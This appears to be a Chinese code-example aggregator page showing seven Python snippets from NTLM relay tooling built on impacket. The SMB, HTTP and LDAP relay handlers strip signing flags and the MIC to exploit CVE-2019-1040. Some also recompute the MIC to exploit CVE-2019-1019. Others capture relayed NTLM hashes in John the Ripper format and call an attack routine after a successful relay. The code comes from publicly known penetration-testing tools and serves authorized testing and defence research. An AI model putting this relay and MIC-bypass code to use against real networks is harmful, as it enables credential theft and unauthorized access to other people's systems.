本文整理汇总了Python中impacket.ntlm.NTLMAuthChallengeResponse方法的典型用法代码示例。如果您正苦于以下问题:Python ntlm.NTLMAuthChallengeResponse方法的具体用法?Python ntlm.NTLMAuthChallengeResponse怎么用?Python ntlm.NTLMAuthChallengeResponse使用的例子?那么恭喜您, 这里精选的方法代码示例或许可以为您提供帮助。您也可以进一步了解该方法所在类impacket.ntlm的用法示例。
在下文中一共展示了ntlm.NTLMAuthChallengeResponse方法的7个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。
示例1: sendAuth
# 需要导入模块: from impacket import ntlm [as 别名]
# 或者: from impacket.ntlm import NTLMAuthChallengeResponse [as 别名]
def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
authMessage = NTLMAuthChallengeResponse()
authMessage.fromString(authenticateMessageBlob)
# When exploiting CVE-2019-1040, remove flags
if self.serverConfig.remove_mic:
if authMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
if authMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
authMessage['MIC'] = b''
authMessage['MICLen'] = 0
authMessage['Version'] = b''
authMessage['VersionLen'] = 0
authenticateMessageBlob = authMessage.getData()
if unpack('B', authenticateMessageBlob[:1])[0] != SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
# We need to wrap the NTLMSSP into SPNEGO
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = authenticateMessageBlob
authData = respToken2.getData()
else:
authData = authenticateMessageBlob
if self.session.getDialect() == SMB_DIALECT:
token, errorCode = self.sendAuthv1(authData, serverChallenge)
else:
token, errorCode = self.sendAuthv2(authData, serverChallenge)
return token, errorCode 示例2: do_GET
# 需要导入模块: from impacket import ntlm [as 别名]
# 或者: from impacket.ntlm import NTLMAuthChallengeResponse [as 别名]
def do_GET(self):
messageType = 0
if self.server.config.mode == 'REDIRECT':
self.do_SMBREDIRECT()
return
if self.headers.getheader('Authorization') is None:
self.do_AUTHHEAD(message = 'NTLM')
pass
else:
typeX = self.headers.getheader('Authorization')
try:
_, blob = typeX.split('NTLM')
token = base64.b64decode(blob.strip())
except:
self.do_AUTHHEAD()
messageType = struct.unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 1:
if not self.do_ntlm_negotiate(token):
#Connection failed
self.server.config.target.log_target(self.client_address[0],self.target)
self.do_REDIRECT()
elif messageType == 3:
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if not self.do_ntlm_auth(token,authenticateMessage):
logging.error("Authenticating against %s as %s\%s FAILED" % (self.target[1],authenticateMessage['domain_name'], authenticateMessage['user_name']))
#Only skip to next if the login actually failed, not if it was just anonymous login or a system account which we don't want
if authenticateMessage['user_name'] != '': # and authenticateMessage['user_name'][-1] != '$':
self.server.config.target.log_target(self.client_address[0],self.target)
#No anonymous login, go to next host and avoid triggering a popup
self.do_REDIRECT()
else:
#If it was an anonymous login, send 401
self.do_AUTHHEAD('NTLM')
else:
# Relay worked, do whatever we want here...
logging.info("Authenticating against %s as %s\%s SUCCEED" % (self.target[1],authenticateMessage['domain_name'], authenticateMessage['user_name']))
ntlm_hash_data = outputToJohnFormat( self.challengeMessage['challenge'], authenticateMessage['user_name'], authenticateMessage['domain_name'], authenticateMessage['lanman'], authenticateMessage['ntlm'] )
logging.info(ntlm_hash_data['hash_string'])
if self.server.config.outputFile is not None:
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], self.server.config.outputFile)
self.server.config.target.log_target(self.client_address[0],self.target)
self.do_attack()
# And answer 404 not found
self.send_response(404)
self.send_header('WWW-Authenticate', 'NTLM')
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length','0')
self.send_header('Connection','close')
self.end_headers()
return 示例3: do_GET
# 需要导入模块: from impacket import ntlm [as 别名]
# 或者: from impacket.ntlm import NTLMAuthChallengeResponse [as 别名]
def do_GET(self):
messageType = 0
if self.server.config.mode == 'REDIRECT':
self.do_SMBREDIRECT()
return
if self.headers.getheader('Authorization') is None:
self.do_AUTHHEAD(message = 'NTLM')
pass
else:
typeX = self.headers.getheader('Authorization')
try:
_, blob = typeX.split('NTLM')
token = base64.b64decode(blob.strip())
except:
self.do_AUTHHEAD()
messageType = struct.unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 1:
if not self.do_ntlm_negotiate(token):
#Connection failed
self.server.config.target.log_target(self.client_address[0],self.target)
self.do_REDIRECT()
elif messageType == 3:
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if not self.do_ntlm_auth(token,authenticateMessage):
logging.error("Authenticating against %s as %s\%s FAILED" % (
self.target[1], authenticateMessage['domain_name'], authenticateMessage['user_name']))
#Only skip to next if the login actually failed, not if it was just anonymous login or a system account which we don't want
if authenticateMessage['user_name'] != '': # and authenticateMessage['user_name'][-1] != '$':
self.server.config.target.log_target(self.client_address[0],self.target)
#No anonymous login, go to next host and avoid triggering a popup
self.do_REDIRECT()
else:
#If it was an anonymous login, send 401
self.do_AUTHHEAD('NTLM')
else:
# Relay worked, do whatever we want here...
logging.info("Authenticating against %s as %s\%s SUCCEED" % (
self.target[1], authenticateMessage['domain_name'], authenticateMessage['user_name']))
ntlm_hash_data = outputToJohnFormat(self.challengeMessage['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.config.outputFile is not None:
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], self.server.config.outputFile)
self.server.config.target.log_target(self.client_address[0],self.target)
self.do_attack( {'CHALLENGE_MESSAGE': self.challengeMessage} )
# And answer 404 not found
self.send_response(404)
self.send_header('WWW-Authenticate', 'NTLM')
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length','0')
self.send_header('Connection','close')
self.end_headers()
return 示例4: sendAuth
# 需要导入模块: from impacket import ntlm [as 别名]
# 或者: from impacket.ntlm import NTLMAuthChallengeResponse [as 别名]
def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
authMessage = NTLMAuthChallengeResponse()
authMessage.fromString(authenticateMessageBlob)
# When exploiting CVE-2019-1040, remove flags
if self.serverConfig.remove_mic:
if authMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
if authMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
authMessage['MIC'] = b''
authMessage['MICLen'] = 0
authMessage['Version'] = b''
authMessage['VersionLen'] = 0
authenticateMessageBlob = authMessage.getData()
if unpack('B', authenticateMessageBlob[:1])[0] != SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
# We need to wrap the NTLMSSP into SPNEGO
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = authenticateMessageBlob
authData = respToken2.getData()
else:
authData = authenticateMessageBlob
signingKey = None
if self.serverConfig.remove_target:
# Trying to exploit CVE-2019-1019
# Discovery and Implementation by @simakov_marina and @YaronZi
respToken2 = SPNEGO_NegTokenResp(authData)
authenticateMessageBlob = respToken2['ResponseToken']
errorCode, signingKey = self.netlogonSessionKey(authData)
# Recalculate MIC
res = NTLMAuthChallengeResponse()
res.fromString(authenticateMessageBlob)
newAuthBlob = authenticateMessageBlob[0:0x48] + b'\x00'*16 + authenticateMessageBlob[0x58:]
relay_MIC = hmac_md5(signingKey, self.negotiateMessage + self.challengeMessage + newAuthBlob)
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = authenticateMessageBlob[0:0x48] + relay_MIC + authenticateMessageBlob[0x58:]
authData = respToken2.getData()
if self.session.getDialect() == SMB_DIALECT:
token, errorCode = self.sendAuthv1(authData, serverChallenge)
else:
token, errorCode = self.sendAuthv2(authData, serverChallenge)
if signingKey:
logging.info("Enabling session signing")
self.session._SMBConnection.set_session_key(signingKey)
return token, errorCode 示例5: do_GET
# 需要导入模块: from impacket import ntlm [as 别名]
# 或者: from impacket.ntlm import NTLMAuthChallengeResponse [as 别名]
def do_GET(self):
messageType = 0
if self.headers.getheader('Authorization') is None:
self.do_AUTHHEAD(message = 'NTLM')
pass
else:
typeX = self.headers.getheader('Authorization')
try:
_, blob = typeX.split('NTLM')
token = base64.b64decode(blob.strip())
except:
self.do_AUTHHEAD()
messageType = struct.unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 1:
if not self.do_ntlm_negotiate(token):
#Connection failed
self.server.config.target.log_target(self.client_address[0],self.target)
self.do_REDIRECT()
elif messageType == 3:
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if not self.do_ntlm_auth(token,authenticateMessage):
logging.error("Authenticating against %s as %s\%s FAILED" % (self.target[1],authenticateMessage['domain_name'], authenticateMessage['user_name']))
#Only skip to next if the login actually failed, not if it was just anonymous login or a system account which we don't want
if authenticateMessage['user_name'] != '': # and authenticateMessage['user_name'][-1] != '$':
self.server.config.target.log_target(self.client_address[0],self.target)
#No anonymous login, go to next host and avoid triggering a popup
self.do_REDIRECT()
else:
#If it was an anonymous login, send 401
self.do_AUTHHEAD('NTLM')
else:
# Relay worked, do whatever we want here...
logging.info("Authenticating against %s as %s\%s SUCCEED" % (self.target[1],authenticateMessage['domain_name'], authenticateMessage['user_name']))
ntlm_hash_data = outputToJohnFormat( self.challengeMessage['challenge'], authenticateMessage['user_name'], authenticateMessage['domain_name'], authenticateMessage['lanman'], authenticateMessage['ntlm'] )
logging.info(ntlm_hash_data['hash_string'])
if self.server.config.outputFile is not None:
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], self.server.config.outputFile)
self.server.config.target.log_target(self.client_address[0],self.target)
self.do_attack()
# And answer 404 not found
self.send_response(404)
self.send_header('WWW-Authenticate', 'NTLM')
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length','0')
self.send_header('Connection','close')
self.end_headers()
return 示例6: sendAuth
# 需要导入模块: from impacket import ntlm [as 别名]
# 或者: from impacket.ntlm import NTLMAuthChallengeResponse [as 别名]
def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
if unpack('B', authenticateMessageBlob[:1])[0] == SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
token = respToken2['ResponseToken']
else:
token = authenticateMessageBlob
authMessage = NTLMAuthChallengeResponse()
authMessage.fromString(token)
# When exploiting CVE-2019-1040, remove flags
if self.serverConfig.remove_mic:
if authMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
if authMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
authMessage['MIC'] = b''
authMessage['MICLen'] = 0
authMessage['Version'] = b''
authMessage['VersionLen'] = 0
token = authMessage.getData()
with self.session.connection_lock:
self.authenticateMessageBlob = token
request = bind.bind_operation(self.session.version, 'SICILY_RESPONSE_NTLM', self, None)
response = self.session.post_send_single_response(self.session.send('bindRequest', request, None))
result = response[0]
self.session.sasl_in_progress = False
if result['result'] == RESULT_SUCCESS:
self.session.bound = True
self.session.refresh_server_info()
return None, STATUS_SUCCESS
else:
if result['result'] == RESULT_STRONGER_AUTH_REQUIRED and self.PLUGIN_NAME != 'LDAPS':
raise LDAPRelayClientException('Server rejected authentication because LDAP signing is enabled. Try connecting with TLS enabled (specify target as ldaps://hostname )')
return None, STATUS_ACCESS_DENIED
#This is a fake function for ldap3 which wants an NTLM client with specific methods 示例7: sendAuth
# 需要导入模块: from impacket import ntlm [as 别名]
# 或者: from impacket.ntlm import NTLMAuthChallengeResponse [as 别名]
def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
authMessage = NTLMAuthChallengeResponse()
authMessage.fromString(authenticateMessageBlob)
# When exploiting CVE-2019-1040, remove flags
if self.serverConfig.remove_mic:
if authMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
if authMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
authMessage['MIC'] = b''
authMessage['MICLen'] = 0
authMessage['Version'] = b''
authMessage['VersionLen'] = 0
authenticateMessageBlob = authMessage.getData()
if unpack('B', authenticateMessageBlob[:1])[0] != SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
# We need to wrap the NTLMSSP into SPNEGO
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = authenticateMessageBlob
authData = respToken2.getData()
else:
authData = authenticateMessageBlob
signingKey = None
if self.serverConfig.remove_target:
# Trying to exploit CVE-2019-1019
# Discovery and Implementation by @simakov_marina
respToken2 = SPNEGO_NegTokenResp(authData)
authenticateMessageBlob = respToken2['ResponseToken']
errorCode, signingKey = self.netlogonSessionKey(authData)
# Recalculate MIC
res = NTLMAuthChallengeResponse()
res.fromString(authenticateMessageBlob)
newAuthBlob = authenticateMessageBlob[0:0x48] + b'\x00'*16 + authenticateMessageBlob[0x58:]
relay_MIC = hmac_md5(signingKey, self.negotiateMessage + self.challengeMessage + newAuthBlob)
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = authenticateMessageBlob[0:0x48] + relay_MIC + authenticateMessageBlob[0x58:]
authData = respToken2.getData()
if self.session.getDialect() == SMB_DIALECT:
token, errorCode = self.sendAuthv1(authData, serverChallenge)
else:
token, errorCode = self.sendAuthv2(authData, serverChallenge)
if signingKey:
logging.info("Enabling session signing")
self.session._SMBConnection.set_session_key(signingKey)
return token, errorCode